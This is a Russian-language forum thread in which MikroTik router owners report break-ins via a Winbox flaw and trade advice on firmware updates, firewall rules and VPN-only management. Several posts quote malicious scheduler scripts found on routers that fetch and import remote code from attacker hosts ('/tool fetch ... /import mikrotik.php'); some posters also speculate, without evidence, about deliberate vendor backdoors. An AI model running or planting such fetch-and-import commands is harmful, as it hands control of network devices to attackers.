Jump to content
Калькуляторы

Проверьте свой микротик на взлом .

 Вчера , проверяя свой домашний тестовый RB750G  обнаружил странные записи в логах и скрипт в system script  /tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no

 который выполнялся через шедуллер через каждые 30 секунд. Прошивка была старая   6.37.5 ....

Гугл не заставил себя долго ждать  - на официальном сайте микротик уже уведомлены об этом.

Обновился до   6.40.8 . сменил пароль....  скрипт  удалил.... Отключил  по совету с форума IP/Socks....

Позвонил знакомый и сообщил что такой же скрипт обнаружил у себя .... с прошивкой 6.41.1....

Не оставили ли они еще какой то заразы в микротике?

 

https://forum.mikrotik.com/viewtopic.php?t=137217&sid=d37ca2abda66df9f536db5c282ad1c85

Кстати первое правило

ip firewall filter
add action=drop chain=input comment="" dst-port=53 in-interface=wan \
    protocol=udp

было не активно....

 

 

 

Edited by uraso

Share this post


Link to post
Share on other sites

Аналогично..

Обнаружил в скриптах

/tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no

 

Воткнут от имени учётки,пароль и юзер не то что бы сложный но не типичный,брутом не прокатит.

 

Чую 53й 

Share this post


Link to post
Share on other sites

@Lerych63 

 

Используется дырка в winbox, закрытая обновлением от 24 апреля. Порт 8291, и для обнаружения используется порт 80.

Обновитесь до 6.40.8 или 6.42.6.

И файрвол настройте уже нормально один раз, я ж давал конфиг в соседней теме.

В правильном конфиге должно быть закрыто ВСЕ, кроме того, что НУЖНО. 

 

Edited by McSea

Share this post


Link to post
Share on other sites

Достаточно в IP-Services отключить все не нужное, а у нужного указать диапазоны IP, и никто ничего не сломает даже на старых прошивках.

Share this post


Link to post
Share on other sites
В 03.08.2018 в 11:03, uraso сказал:

 Вчера , проверяя свой домашний тестовый RB750G  обнаружил странные записи в логах и скрипт в system script  /tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no

 который выполнялся через шедуллер через каждые 30 секунд. Прошивка была старая   6.37.5 ....

Гугл не заставил себя долго ждать  - на официальном сайте микротик уже уведомлены об этом.

Обновился до   6.40.8 . сменил пароль....  скрипт  удалил.... Отключил  по совету с форума IP/Socks....

Позвонил знакомый и сообщил что такой же скрипт обнаружил у себя .... с прошивкой 6.41.1....

Не оставили ли они еще какой то заразы в микротике?

 

https://forum.mikrotik.com/viewtopic.php?t=137217&sid=d37ca2abda66df9f536db5c282ad1c85

Кстати первое правило

ip firewall filter
add action=drop chain=input comment="" dst-port=53 in-interface=wan \
    protocol=udp

было не активно....

 

 

 

 

Так похоже что новые прошивки дырявые на старых 5.26 и старше не единого взлома, а на новых одни проблемы и ни смена пароля настройки файервола ни закрытие 80 порта не даёт результата недавно пошла ещё одна гадость

/tool fetch url=http://ciskotik.com/3.php mode=http dst-path=mikrotik.php
/import mikrotik.php
 

и новые микротики не всегда удается откатить на версию 5.26

Share this post


Link to post
Share on other sites
9 часов назад, EShirokiy сказал:

@alex8031 6.42.7 проблем нет, пофиксили в версии 6.42.1

5.26 это некрофилия

ну насчет 6.42.7 если сейчас нет то что будет через месяц два ??? как с предыдущими. 

а 5.26 почти сотня и ни один не взломан!!!

а новые пару десятков и периодически появляется всякая ерунда если вовремя не убереш приходится ехать к клиенту и ресетить потому что закрвается весь доступ к устройству по всем протаколам.

Share this post


Link to post
Share on other sites

@alex8031 у меня ломали устройства на старых прошивках, нормально коннектился через мак-телнет. Каждый сам выбирает на каких прошивках сидеть, но на старых ПО и функционал хуже.

Share this post


Link to post
Share on other sites
1 час назад, EShirokiy сказал:

@alex8031 у меня ломали устройства на старых прошивках, нормально коннектился через мак-телнет. Каждый сам выбирает на каких прошивках сидеть, но на старых ПО и функционал хуже.

Конечно по мак адресу через телнет можно внутри провайдера и то далеко не всегда а если всё выключено кроме winbox и всё равно ломают видимо разработчик прошивок специально для каких то целей оставляет лазейку, и когда это становится известно посторонним начинаются массовые взломы. Видимо когда создавались старые прошивки не ставилась такая цель!!!

А по функционалу пусть немного беднее зато надёжно...

Share this post


Link to post
Share on other sites
7 hours ago, alex8031 said:

всё равно ломают видимо разработчик прошивок специально для каких то целей оставляет лазейку

Какая лазейка ??   В конце апреля была выявлена конкретная уязвимость, позволяющая получить ВСЕ пароли через винбокс.

В течение двух дней были выпущены фиксы в обеих ветках RouterOS. 

У вас сотня микротиков в управлении, надо же отслеживать регулярно новости по уязвимостям, я лично тут на форуме создавал в день анонса тему, не говоря уже про форум самих микротиков.

 

 

Edited by McSea

Share this post


Link to post
Share on other sites

Если микротик светит в интернет белым IP, то достаточно реализовать управление по VPN, то есть где то в центре стоит микротик, к нему подключаются все другие микротики через интернет, и в службах и у админов устанавливается ограничение доступа с IP = вашей серой подсети. Все, после этого никто взломать уже не сможет.

Share this post


Link to post
Share on other sites
2 часа назад, Saab95 сказал:

Если микротик светит в интернет белым IP, то достаточно реализовать управление по VPN, то есть где то в центре стоит микротик, к нему подключаются все другие микротики через интернет, и в службах и у админов устанавливается ограничение доступа с IP = вашей серой подсети. Все, после этого никто взломать уже не сможет.

Ну так понятно что микротик стоит на бело адресе но только одного не понятно как после апрельского затыкания дыр на новой прошивке в июле опять ломанули??? И второе ограничивать админку микротика одним адресом не всегда удобно  Вероятно дырявая сама реализация протокола winbox в микротиках.

Или же менять порт 8291 на какой нибудь другой может поможет.

Share this post


Link to post
Share on other sites
20 минут назад, alex8031 сказал:

Ну так понятно что микротик стоит на бело адресе но только одного не понятно как после апрельского затыкания дыр на новой прошивке в июле опять ломанули???

Как-как... Вы что думаете, когда я с полгода назад сказал, что микротик дырявый как друшлаг - я пошутил? Киевляне, которые нашли там не отдельную дыру, а функционально связанные лазейки, уже довольно давно начали делиться этим на хакерских форумах. Так что веселье ещё предстоит. Сейчас пока кто-то только использует отдельные дыры в своих целях, и не массово. Лично мне больше интересно узнать, это случайные дыры, или специально оставленные, потому что народ говорил, что по коду очень похоже на второе, правда непонятно зачем.
 

Share this post


Link to post
Share on other sites
11 часов назад, alex8031 сказал:

И второе ограничивать админку микротика одним адресом не всегда удобно  Вероятно дырявая сама реализация протокола winbox в микротиках.

Или же менять порт 8291 на какой нибудь другой может поможет.

Почему одним? Делаете доступ с серой сети, сами подключаетесь к роутеру по VPN.

По поводу ломанули или нет - если в логах посмотрите, то там полно запросов подключения с ошибками логина и пароля, вот сидят и перебирают все комбинации.

Share this post


Link to post
Share on other sites
В 10.09.2018 в 10:32, Saab95 сказал:

Почему одним? Делаете доступ с серой сети, сами подключаетесь к роутеру по VPN.

По поводу ломанули или нет - если в логах посмотрите, то там полно запросов подключения с ошибками логина и пароля, вот сидят и перебирают все комбинации.

Да если бы они просто перебирали им бы лет на 500 точно хватило, столько не только люди но и микротики не живут.

скорее то что написал постом выше straus!!! 

Share this post


Link to post
Share on other sites

Зачем перебирать пароли, если эксплоиты выложены, просто подключаешься и получаешь их. Было тут и про утилиту RouterScan от Stas'M. Кто влип, ограничивайте доступ к винбокс порту только с локалки, проверьте скрипты ненужные, планировщик, фаервол, сокс и прокси, логгирование. Логи любят ограничивать до одной строчки ))). Можно так же посмотреть из любопытства последние команды в CLI, там  много прикольного  проскакивает. 

Share this post


Link to post
Share on other sites

Ну вот и я наступил на грабли, вернее, их мне подложили.

Прочитал про уязвимости циски и микротика еще в начале лета. Обновил еще тогда свой головной RB3011 до 6.40.9. И вот 2 дня назад получил "wrong username or password". LCD отключён. 

Пришлось делать netinstall, 6.43, полную перенастройку, т.к. бэкапа не было (он работал без всяких проблем уже 3-й год), вроде всё хорошо, заодно обновил знания и кое-что из настроек. Позакрывал все возможные дыры, как из рекомендаций, так и  исходя из своих особенностей.

Все сервисы кроме winbox закрыты, и тот доступен только из моей подсети и рабочего IP.

2 дня как бы всё ок, и тут сегодня опять "wrong username or password". 

No comments, одни мысли и те матом. 

LCD работает, даже конфиг могу reset, но мне здаётся, что дело не в бобине...

По логам на LCD только мои неудачные попытки входа, больше  ничего нет.

Edited by Parrot

Share this post


Link to post
Share on other sites
1 час назад, Parrot сказал:

до 6.40.9

Так в этой проше вроде заделана дыра?!

1 час назад, Parrot сказал:

Все сервисы кроме winbox закрыты, и тот доступен только из моей подсети и рабочего IP.

 

Тем более...

 

Что-то тут не то. Или нашлась новая дырка(

Share this post


Link to post
Share on other sites

Вот и у меня диссонанс на фоне вчерашнего ДР, когда перед ним я провозился почти 6 часов, заново настраивая эту шайтан-машину.

Официальный форум микротик также мне пишет всякую хрень аля "вы учётные данные сменили при перепрошивке"?

Share this post


Link to post
Share on other sites
Только что, Parrot сказал:

Вот и у меня диссонанс на фоне вчерашнего ДР, когда перед ним я провозился почти 6 часов, заново настраивая эту шайтан-машину.

Официальный форум микротик также мне пишет всякую хрень аля "вы учётные данные сменили при перепрошивке"?

Ну только откатываться на 5,26 или старше у меня на этой ни один не сломали а новые кошмарят по чёрному такое впечатление что производитель этих железок нанял программистов и не заплатил людям за работу а те выложили на суд общественности дыры в прошивках?? Или есть другое мнение???

Share this post


Link to post
Share on other sites
34 минуты назад, alex8031 сказал:

Или есть другое мнение???

Есть. Есть некая дыра, которую зловреды уже опять обнаружили, но официальный производитель признавать не торопится.

Всяческие рекомендации, аля "прописать в firewall 100500 правил для защиты" - не комильфо (прописано 1050).  Оборудование и софт по-умолчанию не должны быть открыты насквозь вдоль и поперёк. Если покупатель, сконфигурировав оборудование под свои нужды, должен еще прописать 100500 правил в фаерволе, то это кусок г-на на лопате, а не софт и hardware. 

Share this post


Link to post
Share on other sites

Лет 5 стоит штук 20 микр на сети, софт 5.25, 6 правил, никто не ломает.

0.thumb.png.4ace7680f248db047044cc2aebdbb2fb.png

Share this post


Link to post
Share on other sites

вчера вечером опять была волна атак на микроты 

2018-09-15_010117.jpg

2018-09-15_010247.jpg

2018-09-15_010801.jpg

Share this post


Link to post
Share on other sites
25 минут назад, Ferdin сказал:

вчера вечером опять была волна атак на микроты 

какая версия?

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this